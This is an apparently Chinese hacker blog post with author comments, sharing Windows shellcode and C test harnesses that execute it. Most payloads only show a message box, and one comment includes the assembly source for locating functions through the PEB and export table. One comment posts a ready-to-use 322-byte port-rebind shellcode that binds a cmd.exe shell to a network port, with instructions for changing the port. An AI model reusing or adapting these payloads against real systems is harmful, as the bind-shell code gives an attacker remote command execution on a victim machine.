KYO的地盘 心情日记+搜集的文章

User Login User: Password:   Categories > Index > 黑客技术文章 (167) > KYO--随笔 (95) Calender <<  <  2010 - 09  >  >> Su Mo Tu We Th Fr Sa       1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 Latest Topics - tips7 - tips5 (DLL注入调试)(shu... - mysql搜索盲注中戏 - tips 小记录 sql - tips33 netstat tasklis... - 聊城 - 黑客网址记录 - vpn ntdll.ZwContinue - 然后 - mysql 口令算法 Latest Comments - 【文章标题】: Delphi程序... - http://hashchecker.de/... - <body onselects... - 得到客户端主机名: sel&... - 得到客户端主机名: se... - 对于SQL2005,貌似NBSI,穿... - ASProtect 1.2 / 1.2c-> ... - 脱壳也玩了一阵子了 感觉... - 手脱 EXEStealth 2.75a -... - 其实合并区段减少不了多少... Search Blog Title Content Comments Blog Statistics Topics: 284 Comments: 102 TrackBacks: 0 Members: 25 Visits: 7936343 Links KYO的地盘

<< 搞笑的管理员 Category: 黑客技术文章 又一种环境的突破 >> SHELLCODE测试代码    [ 2007-01-11 1:17:31 AM | Author: kyo327 | From: Original ] #include<windows.h> char ShellCode[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\x9b\x80\x34\x0b\xfe\xe2\xfa\xeb\x05" "\xe8\xed\xff\xff\xff\x17\x7b\xfe\xfe\xfe\xa1\x9a\x5f\xce\xfe\xfe" "\xfe\x75\xbe\xf2\x75\x8e\xe2\x53\x75\x96\xf6\x75\x09\x94\xfc\xa7" "\x16\xdb\xfe\xfe\xfe\x1c\x07\x96\xcd\xcc\xfe\xfe\x96\x8b\x8d\x9b" "\x8c\xaa\x01\xe8\x75\x16\x94\xff\xa7\x16\xf2\xfe\xfe\xfe\x1c\x07" "\xaf\xa9\xa9\xaf\x01\xa8\xf6\x01\xa8\xfa\xaf\xa8\x75\x8b\xc2\x75" "\x8a\xd0\x86\xfd\x0b\xa8\x75\x88\xde\xfd\x0b\xcd\x37\xb7\xbf\x53" "\xfd\x3b\xcd\x25\xf1\x40\xee\xc4\x28\x8a\xf6\x3f\x35\xf9\xfd\x24" "\xbe\x15\x0f\xc5\xe1\x8b\x19\xa0\x75\xa0\xda\xfd\x23\x98\x75\xf2" "\xb5\x75\xa0\xe2\xfd\x23\x75\xfa\x75\xfd\x3b\x55\xa0\xa7\x3d\x16" "\x88\x01\x01\x01\xcc\x8a\x6f\xf2\x9d\x77\x2f\xb1\x94\xf4\xc6\xe0" "\x68\x61\x70\x70\x79\x20\x66\x6F\x72\x20\x32\x30\x30\x37\x00"; int main() { ( (void(*)(void)) &ShellCode)(); return 0; } 通用的,测试弹一个小窗口!!呵呵! [ Edited by kyo327 at 2007-01-11 1:26:45 AM ] http://www.kyospace.com/feedcomm.asp?logID=188  kyo327 Posted at 2007-01-11 1:24:33 AM #include<windows.h> char ShellCode[]= "\xeb\x0e\x5b\x4b\x33\xc9\xb1\x9b\x80\x34\x0b\xfe\xe2\xfa\xeb\x05" "\xe8\xed\xff\xff\xff\x17\x7b\xfe\xfe\xfe\xa1\x9a\x5f\xce\xfe\xfe" "\xfe\x75\xbe\xf2\x75\x8e\xe2\x53\x75\x96\xf6\x75\x09\x94\xfc\xa7" "\x16\xdb\xfe\xfe\xfe\x1c\x07\x96\xcd\xcc\xfe\xfe\x96\x8b\x8d\x9b" "\x8c\xaa\x01\xe8\x75\x16\x94\xff\xa7\x16\xf2\xfe\xfe\xfe\x1c\x07" "\xaf\xa9\xa9\xaf\x01\xa8\xf6\x01\xa8\xfa\xaf\xa8\x75\x8b\xc2\x75" "\x8a\xd0\x86\xfd\x0b\xa8\x75\x88\xde\xfd\x0b\xcd\x37\xb7\xbf\x53" "\xfd\x3b\xcd\x25\xf1\x40\xee\xc4\x28\x8a\xf6\x3f\x35\xf9\xfd\x24" "\xbe\x15\x0f\xc5\xe1\x8b\x19\xa0\x75\xa0\xda\xfd\x23\x98\x75\xf2" "\xb5\x75\xa0\xe2\xfd\x23\x75\xfa\x75\xfd\x3b\x55\xa0\xa7\x3d\x16" "\x88\x01\x01\x01\xcc\x8a\x6f\xf2\x9d\x77\x2f\xb1\x94\xf4\xc6\xe0" "happy for 2007\x00"; int main() { _asm { lea eax,ShellCode call eax } return 0; }  kyo327 Posted at 2007-01-12 10:58:43 PM 方便用，比较小一点，只有322bytes，LSD那个方法编译出来有500多bytes，呵呵 port 是倒数第四个字节起的2个字节. 这里默认是21端口，\x15\x00 /* 322 bytes */ "\xe9\x10\x01\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" "\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x03\x59\xe8\xb0\x00\x00\x00" "\xe2\xf9\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\xff\x16\x8b" "\xe8\x6a\x06\x59\xe8\x97\x00\x00\x00\xe2\xf9\x33\xdb\x43\xff\x56" "\x20\x83\xfb\x64\x75\xf7\x83\xc7\x04\x81\xec\x90\x01\x00\x00\x54" "\x68\x01\x01\x00\x00\xff\x56\x0c\x50\x50\x50\x50\x6a\x01\x6a\x02" "\xff\x56\x10\x8b\xd8\x33\xc0\x50\x50\x66\x8b\x56\x24\x86\xd6\xc1" "\xca\x10\x66\xba\x02\x00\x52\x8b\xd4\x6a\x10\x52\x53\xff\x56\x14" "\x6a\x01\x53\xff\x56\x18\x50\x50\x53\xff\x56\x1c\x8b\xd8\x68\x63" "\x6d\x64\x00\x8d\x14\x24\x83\xec\x54\x8b\xfc\x6a\x14\x59\x33\xc0" "\x89\x04\x8f\xe2\xfb\xc6\x47\x10\x44\xfe\x47\x3c\xfe\x47\x3d\x89" "\x5f\x48\x89\x5f\x4c\x89\x5f\x50\x8d\x47\x10\x57\x50\x51\x51\x51" "\x6a\x01\x51\x51\x52\x51\xff\x56\x04\x33\xc0\x48\x50\xff\x56\x08" "\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03" "\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74" "\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e" "\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03" "\xc5\xab\x5e\x59\xc3\xe8\xeb\xfe\xff\xff\x32\x74\x91\x0c\xc9\xbc" "\xa6\x6b\x8f\xf2\x18\x61\x3d\x6a\xb4\x80\x2d\x32\x78\xde\x64\x10" "\xa7\xdd\x0c\x9f\xd3\x4b\xb1\x1e\x97\x01\x7c\xe2\x9b\x7c\x15\x00" "\xbf\xe5"; Windows 2k/XP/2k3 322 bytes port rebind shellcode  kyo327 Posted at 2008-11-23 5:33:02 AM #include <stdio.h> //224 bytes MessageBox() shellcode(NT/2K/XP) unsigned char sh4llcode[] ="" "\xE9\xA7\x00\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B" "\x70\x1C\xAD\x8B\x40\x08\x50\x52\x6A\x0C\xE8\x2F\x00\x00\x00\x5B" "\x83\xC3\x0D\x53\xFF\xD0\x83\xC3\x07\x53\x6A\x0B\xE8\x1D\x00\x00" "\x00\x5B\x83\xC3\x18\x6A\x00\x53\x53\x6A\x00\xFF\xD0\xBA\x0C\x00" "\x00\x00\x58\x2B\xDA\x53\x52\xE8\x02\x00\x00\x00\xFF\xD0\x8B\xD8" "\x83\xC0\x3C\x8B\x00\x03\xC3\x80\x38\x50\x75\x49\x8B\x40\x78\x03" "\xC3\x50\x8B\xC8\x8B\x49\x14\x8B\x40\x20\x03\xC3\x55\x8B\xE8\x33" "\xD2\x51\x8B\x00\x03\xC3\x8B\xF8\x8B\x74\x24\x14\x8B\x4C\x24\x10" "\xFC\xF3\xA6\x75\x17\x83\xC4\x04\x8B\x44\x24\x04\x8B\x40\x1C\x03" "\xC3\xC1\xE2\x02\x03\xC2\x8B\x00\x03\xC3\xEB\x0B\x42\x83\xC5\x04" "\x8B\xC5\x59\xE2\xCC\x33\xC0\x5D\x59\xC2\x04\x00\xE8\x54\xFF\xFF" "\xFF\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x73" "\x65\x72\x33\x32\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41" "\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00" "OK" ; int main() { void (*c0de)(); printf("Win32 \"MessageBox() shellcode\"\n"); *(int*)&c0de = sh4llcode; c0de(); } //以下是源码 /* void shellcode() { //做标记方便寻找shellcode __asm { nop nop nop nop nop nop nop nop } __asm { // --------------------解码---------------------- // jmp decode_end //decode_start: // pop ebx; //取回shellcode在内存中的位置 // dec ebx; // xor ecx,ecx; // mov cx,0xffff; //shellcode的长度 //decode_loop: // xor byte ptr [edx+ecx],0x99; //解码 // loop decode_loop; // jmp decode_ok; //decode_end: // call decode_start; //decode_ok: // --------------------解码---------------------- jmp end start: pop edx; //取回shellcode在内存中的位置 mov eax, fs:0x30 mov eax, [eax + 0x0c] mov esi, [eax + 0x1c] lodsd mov eax,[eax+8] //从peb获取kernel32.dll的基址` push eax; push edx; push 0xc; call getaddr; //调用getaddr函数获取LoadLibraryA函数地址. pop ebx; add ebx,0xd; push ebx; call eax; //调用LoadLibraryA("user32"),加载user32.dll; add ebx,0x7; push ebx; push 0xb; call getaddr; //调用getaddr函数获取MessageBoxA函数地址. pop ebx; add ebx,0x18; push 0; push ebx; push ebx; push 0; call eax; //调用MessageBoxA mov edx,0xc; pop eax; sub ebx,edx; push ebx; push edx; call getaddr; //调用getaddr函数获取exitprocess函数地址. call eax; //调用exitprocess getaddr: mov ebx,eax; add eax,0x3c; //定位e_lfanew字段位置 mov eax,[eax] add eax,ebx; //定位pe头 cmp [eax],0x00004550 jne NotFound; mov eax,[eax + 0x78] //文件的定位导出表 add eax,ebx; push eax; mov ecx,eax; //ecx指向导出表; mov ecx,[ecx + 0x14] //找出导出表中函数个数作为循环值 mov eax,[eax + 0x20]; add eax,ebx; push ebp; mov ebp,eax; //ebp保存函数指针数组的指针 xor edx,edx; //edx清0用于存放函数索引 FindLoop: push ecx; mov eax,[eax]; add eax,ebx; mov edi,eax mov esi,[esp + 0x14]; mov ecx,[esp + 0x10]; cld rep cmpsb jne FindNext //比较,如果不是,则取下一个函数 add esp,4 mov eax,[esp + 0x4]; mov eax,[eax + 0x1c] add eax,ebx; shl edx,2 //函数索引*函数长度(默认为4个字节) add eax,edx; //函数地址表基址+(函数索引) mov eax,[eax]; add eax,ebx; jmp Found FindNext: inc edx; add ebp,4; mov eax,ebp; //函数指针指向下一个函数 pop ecx; loop FindLoop NotFound: xor eax,eax Found: pop ebp; pop ecx; ret 4; //本函数有两个参数,这里只平衡了一个4字节的堆栈; // ================== 结束调用 ==================== end: call start _emit 'L'; _emit 'o'; _emit 'a'; _emit 'd'; _emit 'L'; _emit 'i'; _emit 'b'; _emit 'r'; _emit 'a'; _emit 'r'; _emit 'y'; _emit 'A'; _emit 0x00; _emit 'u'; _emit 's'; _emit 'e'; _emit 'r'; _emit '3'; _emit '2'; _emit 0x00; _emit 'M'; _emit 'e'; _emit 's'; _emit 's'; _emit 'a'; _emit 'g'; _emit 'e'; _emit 'B'; _emit 'o'; _emit 'x'; _emit 'A'; _emit 0x00; _emit 'E'; _emit 'x'; _emit 'i'; _emit 't'; _emit 'P'; _emit 'r'; _emit 'o'; _emit 'c'; _emit 'e'; _emit 's'; _emit 's'; _emit 0x00; _emit 'O'; _emit 'K'; _emit 0x00; off: } __asm { nop nop nop nop nop nop nop nop } //return; } */  kyo327 Posted at 2009-03-20 3:07:06 PM char shellcode[] ="\xEB\xFE"; jmp -1 Post Comment Topic Locked or You don't have the Permission. No Comment Allowed.

Here is kyo's blog © 2004-2005  Processed in 0.078003 second(s)